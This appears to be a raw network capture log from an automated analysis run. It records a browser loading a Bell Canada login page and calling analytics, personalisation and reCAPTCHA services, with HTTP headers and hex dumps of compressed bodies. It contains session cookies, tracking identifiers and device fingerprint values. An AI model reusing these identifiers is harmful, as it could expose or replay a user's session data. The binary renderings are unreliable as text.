                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:13 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: cdf7bdf1-501e-0029-3f94-27d0b8000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131213Z-17c5cb586f62vrfquq10qybcuw00000002m00000000068sk
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:13 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      136192.168.2.94993718.66.27.344433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC531OUTGET /branch-latest.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: cdn.branch.io
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                      Content-Length: 23431
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:15 GMT
                                                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 10 Apr 2024 21:44:10 GMT
                                                                                                                                                                                                                                                                                                                                      x-amz-version-id: JdSJSDd4bnNFPjlwdZ2RC7ixUU_rrhPQ
                                                                                                                                                                                                                                                                                                                                      ETag: "f4ec9657a3dc111d088e2eca7b9796a4"
                                                                                                                                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                      Via: 1.1 75373f3f77c169166bbce98d302dff7c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: VIE50-P1
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: W5xJNgjeS5LRaPOF-1xAJ2o67UJ0xga-7KFfO1bNK8KGrDoMhcTZGQ==
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8444INData Raw: 1f 8b 08 08 4d 04 17 66 00 03 62 75 69 6c 64 2e 6d 69 6e 2e 6a 73 00 ed bd 79 5f db c8 b2 30 fc 3f 9f 42 68 72 89 34 16 c2 26 c9 2c 52 14 bf 04 48 c2 4c 16 06 48 32 33 84 e3 db 5a 6c 14 6c cb 58 36 4b c0 ef 67 7f aa aa bb a5 6e 49 06 66 ce 39 f7 79 7e f7 77 ce 12 ac 5e aa b7 ea ea aa ea aa 6a ab 3f 1f 47 b3 34 1b 5b b6 71 b3 f1 fd ca 8a b1 9d 4d ae a7 e9 e0 74 66 1c 9d 26 c6 f6 30 cb e7 d3 c4 78 9b 86 53 36 bd 36 b6 e6 b3 d3 6c 9a bb 2b c6 e1 fe ce ef eb 6f d3 28 19 e7 c9 fa 5e 9c 8c 67 69 3f 4d a6 9e b1 35 61 d1 69 b2 be e9 b6 57 be df 58 b9 60 53 83 b1 c0 94 ed 98 41 30 bb 9e 24 59 df f8 10 7e 4d a2 99 1b 27 fd 74 9c ec 4f b3 49 32 9d a5 49 de 6d 4a bf f6 8a 7e 32 27 74 22 fb 26 ed 5b 2c 08 b6 a6 53 76 ed 4e a6 d9 2c 43 a8 b7 b7 90 26 ea 17 89 f6 34 99
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Mfbuild.min.jsy_0?Bhr4&,RHLH23ZllX6KgnIf9y~w^j?G4[qMtf&0xS66l+o(^gi?M5aiWX`SA0$Y~M'tOI2ImJ~2't"&[,SvN,C&4
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC4296INData Raw: 8d b4 1c 64 29 cb f6 2c 86 16 c4 fc f2 62 fb 34 1d c6 d0 8c b3 a4 fc ef 18 0e da a4 35 46 0b e7 c6 62 91 2c 36 cc a0 27 0e ca 82 8a 88 f3 41 1c 7f 5c 74 e5 61 2b ca 78 ab 70 be cd 99 2f fc 6c d7 d6 30 88 0a 05 7a 6a b5 44 94 06 89 89 85 5a b1 67 b6 28 df 19 04 6d 0c e9 51 c8 8e 65 8c 60 bb 6b ae 11 de 98 9e b9 36 c9 72 7e 29 10 98 a8 24 93 e4 20 ee 36 9c e7 3b cc 3a e5 72 bb 60 88 e6 41 61 b3 57 98 54 29 4c 19 cf 3c 3e 3b 51 19 d1 85 ff da ba 72 46 ce 25 45 72 f4 13 4b 84 f4 3d 10 1b 70 06 70 62 03 20 01 e2 91 36 e5 59 fb 29 70 e9 e7 40 af 1a e0 0d 65 2b 2e b1 8c b2 13 73 04 4c b5 87 30 db 4c 43 4d 2b 6c 59 ed 17 ca cc 74 71 46 ba 18 58 d7 6e 01 5f 33 68 45 fc a7 3e 7f 1b d1 06 cd 1c a9 c2 83 0e 2f 0e 9f 62 e2 81 03 3a 73 94 61 d6 c6 15 82 94 7c 06 23 0b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: d),b45Fb,6'A\ta+xp/l0zjDZg(mQe`k6r~)$ 6;:r`AaWT)L<>;QrF%ErK=ppb 6Y)p@e+.sL0LCM+lYtqFXn_3hE>/b:sa|#
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC1432INData Raw: d6 81 7e 16 b3 0f ab f7 58 87 5a 3e 83 45 c5 95 04 59 a9 fe af 89 91 50 ea 7c 41 11 53 48 61 10 a2 82 41 08 83 65 f3 4d ee b7 b8 e4 2c 45 56 e0 c5 73 a6 16 d2 f4 51 e5 aa d0 bd 21 d0 06 4e 6f 01 3d d8 14 98 d9 c0 ec 09 83 62 5c 68 cb e2 af cc e0 1b 80 22 70 6c 97 b9 53 e6 31 37 63 84 92 4c 8e 08 79 f5 77 dd 82 6d f5 2c 16 08 de 46 f2 34 b6 13 91 fb 45 c9 e4 c6 91 74 f1 55 58 f7 c4 1a 38 f3 66 4f 5c 0c d2 32 0f 06 0e 0f d4 32 08 06 c4 5f 4b a1 2e 2c 85 ba fe dd 42 5d a8 0a 75 fd 66 a1 ae c1 bd 23 74 0f ba 31 67 e6 55 77 95 23 0c 58 79 40 0c bc d7 90 bd da 26 87 96 81 1b b3 ae d5 d0 57 9d 51 e4 7d e1 aa 9c 23 e8 fd 68 69 bf 97 d7 7b c9 47 72 66 3b 87 61 cd 7f 44 ba 5f 98 b6 f3 0e 25 a2 77 d6 7d 9e 27 28 d7 83 7c 32 b7 6c 58 d5 66 8f 65 84 e4 3f 14 92 bf 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ~XZ>EYP|ASHaAeM,EVsQ!No=b\h"plS17cLywm,F4EtUX8fO\22_K.,B]uf#t1gUw#Xy@&WQ}#hi{Grf;aD_%w}'(|2lXfe?2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC4296INData Raw: 6f ca 2e bf 69 ee 72 1d 6e 1b c0 d2 c1 ea d3 c1 ea d3 c1 ea d3 81 ab d3 85 2e f3 0e f1 5c 25 8a a1 d9 1c 54 69 44 89 90 87 e5 76 83 33 3b 44 f8 4d 4b 52 da 4f 68 25 1e 1c 07 e3 2f d6 68 6a d5 f6 77 22 98 77 f6 d7 ac 5a b8 95 cd 3d 23 aa 9a bb d0 44 fc b3 66 25 c4 22 e0 23 38 74 af 97 46 f2 1e fd 00 08 6e 3f 72 2f 19 6c af df 7c 13 e9 d4 90 3f 4d ff 15 a9 6a 1c c0 22 a3 51 cc 6a 3a 9a 64 d3 19 c3 37 e3 13 95 ed 60 2d cb 6c b4 57 59 4f 46 61 12 c3 cc e8 16 32 25 a0 d2 92 c6 6c ad d0 3b 05 c2 26 c7 6c c5 fc d5 02 e9 61 31 b9 52 6b 15 56 4b 7a b2 af 99 c7 24 c2 e0 e5 df 63 26 64 fc 15 3b 21 7d fa 4a 90 95 64 0c b5 1a b6 cc e6 61 98 22 cc 24 ab 59 28 fe df b0 7c 32 5b 07 d8 af aa e9 13 05 40 7b a8 fd d2 6f 62 64 cb ac e8 96 5b c2 89 0d 87 51 44 4a ea 6f aa ce
                                                                                                                                                                                                                                                                                                                                      Data Ascii: o.irn.\%TiDv3;DMKROh%/hjw"wZ=#Df%"#8tFn?r/l|?Mj"Qj:d7`-lWYOFa2%l;&la1RkVKz$c&d;!}Jda"$Y(|2[@{obd[QDJo
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC4963INData Raw: 71 3a 58 17 32 6c 6f 13 7f 02 77 42 15 16 fd 74 8c 81 cf 6e ce 30 74 07 f2 43 9c 6b c7 f2 b1 bb 25 75 f8 03 6b 77 3a 05 f9 7f cb 32 5f 12 36 1a 87 3b bf 1a 62 ef a6 df b8 d6 1d c5 01 58 4c 72 ef 62 86 28 07 3b fe 34 8b 8d 4b 96 1b 38 d2 24 c6 c7 7f 73 d8 67 06 1a 52 9c 26 c6 f9 3c 99 c3 07 fa a0 61 4c 29 ce bf 40 0f 36 ff 46 0f fa 0c 24 b9 d8 31 f2 0c 30 61 8a 8c be 68 1f 1b 1f 8f b3 99 11 26 a2 1b 18 d8 fc a5 b3 12 bb 3b 6a a3 6d de 28 ec d8 7b 9b 46 68 45 f3 68 62 27 c0 2c 46 ee 7c cc 43 a9 0c 6c 1e 82 68 78 6d c5 20 78 c1 71 5e de 9e fc c9 2f 5c 56 2d c4 50 00 94 cf 90 83 80 39 f9 b3 b8 80 39 03 41 c2 3a 8b c9 8d e4 4f db 01 c4 c7 b2 80 01 01 46 76 e1 1f 03 ca 7d 15 f2 af 47 f4 f5 56 7c cd d1 71 97 7e 45 2c 30 81 ec 6c ba 3f 3d 73 db 26 4f 1b e2 35 08
                                                                                                                                                                                                                                                                                                                                      Data Ascii: q:X2lowBtn0tCk%ukw:2_6;bXLrb(;4K8$sgR&<aL)@6F$10ah&;jm({FhEhb',F|Clhxm xq^/\V-P99A:OFv}GV|q~E,0l?=s&O5


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      137192.168.2.949941130.61.120.24433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC483OUTGET /i/14028/693653/c.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: collection.decibelinsight.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC1089INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                      Content-Length: 19814
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      x-di-debug: node=c113-248-eu-frankfurt-1 df=61633
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=1800
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; Path=/i/14028/; Domain=.decibelinsight.net; Max-Age=31536000; HttpOnly; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; Path=/i/14028/; Domain=.decibelinsight.net; Max-Age=1800; HttpOnly; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                      ETag: W/012561113-192E2B485C2
                                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Cache-Control, Pragma, If-None-Match, Accept, X-HTTP-Method-Override, X-DI-jspsf, X-DI-cookieflags, X-DI-sid, X-DI-lid, X-DI-lid-renew, X-DI-sid-renew, X-DI-lid-time, X-DI-int-state
                                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 604800
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000, h2=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC7103INData Raw: 7b 22 64 61 5f 77 65 62 73 69 74 65 49 64 22 3a 36 39 33 36 35 33 2c 22 64 61 5f 61 63 63 6f 75 6e 74 5f 66 6c 61 67 73 22 3a 32 32 35 32 37 2c 22 64 61 5f 61 63 63 6f 75 6e 74 5f 66 6c 61 67 73 5f 6f 72 69 67 22 3a 32 32 35 32 37 2c 22 64 61 5f 73 65 73 73 69 6f 6e 49 64 5f 65 22 3a 22 38 34 45 36 35 34 46 31 38 41 44 32 41 45 38 39 41 36 31 36 41 41 31 33 41 36 42 34 43 43 36 41 38 46 2e 31 22 2c 22 64 61 5f 6c 65 61 64 49 64 5f 65 22 3a 22 42 37 44 35 36 37 43 32 39 45 39 32 45 41 31 32 33 33 34 37 42 42 39 39 45 34 42 36 38 36 36 31 33 43 22 2c 22 64 61 5f 64 6e 73 52 65 63 6f 72 64 22 3a 22 63 6f 6c 6c 65 63 74 69 6f 6e 2e 64 65 63 69 62 65 6c 69 6e 73 69 67 68 74 2e 6e 65 74 22 2c 22 64 61 5f 61 6e 6f 6e 79 6d 69 73 65 49 50 22 3a 66 61 6c 73 65 2c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"da_websiteId":693653,"da_account_flags":22527,"da_account_flags_orig":22527,"da_sessionId_e":"84E654F18AD2AE89A616AA13A6B4CC6A8F.1","da_leadId_e":"B7D567C29E92EA123347BB99E4B686613C","da_dnsRecord":"collection.decibelinsight.net","da_anonymiseIP":false,
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC8192INData Raw: 67 69 64 5f 37 22 3a 22 23 73 75 62 6d 69 74 22 7d 2c 22 64 61 5f 66 6f 72 6d 43 6f 6c 6c 65 63 74 69 6f 6e 22 3a 32 2c 22 64 61 5f 66 6f 72 6d 47 72 6f 75 70 43 72 69 74 65 72 69 61 22 3a 22 64 69 2d 69 64 2c 69 64 2c 6e 61 6d 65 2c 68 61 73 68 2c 75 72 6c 22 2c 22 64 61 74 61 4c 61 79 65 72 52 75 6c 65 73 22 3a 5b 7b 22 63 6f 6e 76 65 72 74 65 64 45 76 65 6e 74 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6c 69 63 6b 22 2c 22 74 61 72 67 65 74 22 3a 22 23 62 74 6e 53 75 62 6d 69 74 42 79 4e 65 77 43 75 73 74 6f 6d 65 72 42 75 74 74 6f 6e 22 7d 2c 22 61 63 74 69 6f 6e 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 64 54 72 61 63 6b 65 64 45 76 65 6e 74 22 2c 22 61 72 67 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 33 22 7d 7d 7d 2c 7b 22 63 6f 6e 76 65 72 74 65 64 45 76 65 6e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: gid_7":"#submit"},"da_formCollection":2,"da_formGroupCriteria":"di-id,id,name,hash,url","dataLayerRules":[{"convertedEvent":{"name":"click","target":"#btnSubmitByNewCustomerButton"},"action":{"name":"sendTrackedEvent","args":{"name":"3"}}},{"convertedEven
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC4519INData Raw: 67 68 77 2c 31 65 62 62 76 33 76 2c 6c 37 65 31 36 63 2c 31 6b 30 6a 39 63 65 2c 36 36 71 71 67 72 2c 31 64 74 6a 6c 37 62 2c 31 6e 72 63 62 74 30 2c 64 69 76 66 70 39 2c 31 61 73 6e 6c 6f 63 2c 33 34 72 73 70 66 2c 31 70 71 63 30 75 6e 2c 6a 31 76 63 6f 73 2c 31 76 75 38 77 33 75 2c 6e 69 61 78 74 71 2c 31 64 71 6a 64 7a 2c 31 65 67 75 78 66 36 2c 62 76 68 61 70 75 2c 31 61 38 34 37 74 62 2c 61 6f 33 64 6b 79 2c 31 38 68 6c 70 35 35 2c 31 31 37 65 35 6e 61 2c 39 6c 66 79 37 69 2c 6a 71 64 65 77 67 2c 36 36 34 68 31 67 2c 31 62 65 32 6b 33 6d 2c 6a 73 76 78 6a 32 2c 72 68 36 72 70 6a 2c 34 6d 6d 30 31 70 2c 6e 61 6a 65 6d 6c 2c 70 76 38 74 7a 33 2c 6f 30 64 73 63 67 2c 31 37 66 32 75 66 70 2c 34 67 70 33 32 6c 2c 7a 66 36 30 64 34 2c 31 65 6f 33 6f 38 7a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ghw,1ebbv3v,l7e16c,1k0j9ce,66qqgr,1dtjl7b,1nrcbt0,divfp9,1asnloc,34rspf,1pqc0un,j1vcos,1vu8w3u,niaxtq,1dqjdz,1eguxf6,bvhapu,1a847tb,ao3dky,18hlp55,117e5na,9lfy7i,jqdewg,664h1g,1be2k3m,jsvxj2,rh6rpj,4mm01p,najeml,pv8tz3,o0dscg,17f2ufp,4gp32l,zf60d4,1eo3o8z


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      138192.168.2.94994266.235.152.2214433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC3607OUTGET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=&mboxPage=38354bc94d0a493099a306274bc21c84&mboxRid=37fe7f796df14429b4eff85641053e61&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365927825&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=03870B84460DADFF-291E557ADEB59CD2&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: somni.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSR [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC586INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      content-type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      content-length: 2323
                                                                                                                                                                                                                                                                                                                                      vary: origin,access-control-request-method,access-control-request-headers,accept-encoding
                                                                                                                                                                                                                                                                                                                                      x-request-id: 37fe7f796df14429b4eff85641053e61
                                                                                                                                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                      server: jag
                                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC2323INData Raw: 7b 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 65 38 61 63 63 32 32 38 35 34 31 35 34 38 30 64 62 62 66 35 34 61 64 36 66 38 35 34 61 39 36 65 22 2c 22 74 6e 74 49 64 22 3a 22 65 38 61 63 63 32 32 38 35 34 31 35 34 38 30 64 62 62 66 35 34 61 64 36 66 38 35 34 61 39 36 65 2e 33 37 5f 30 22 2c 22 6f 66 66 65 72 73 22 3a 5b 7b 22 70 6c 75 67 69 6e 73 22 3a 5b 22 3c 73 63 72 69 70 74 20 74 79 70 65 3d 5c 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 5c 22 3e 5c 72 5c 6e 2f 2a 6d 62 6f 78 48 69 67 68 6c 69 67 68 74 2b 20 20 76 31 20 3d 3d 3e 20 52 65 73 70 6f 6e 73 65 20 50 6c 75 67 69 6e 2a 2f 5c 72 5c 6e 77 69 6e 64 6f 77 2e 74 74 4d 45 54 41 3d 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 2e 74 74 4d 45 54 41 29 21 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 3f 77 69
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"sessionId":"e8acc2285415480dbbf54ad6f854a96e","tntId":"e8acc2285415480dbbf54ad6f854a96e.37_0","offers":[{"plugins":["<script type=\"text/javascript\">\r\n/*mboxHighlight+ v1 ==> Response Plugin*/\r\nwindow.ttMETA=(typeof(window.ttMETA)!='undefined')?wi


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      139192.168.2.949938172.217.18.1004433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC947OUTGET /recaptcha/enterprise/anchor?ar=1&k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP&co=aHR0cHM6Ly9teWJlbGwuYmVsbC5jYTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=h2gb06tnckv8 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
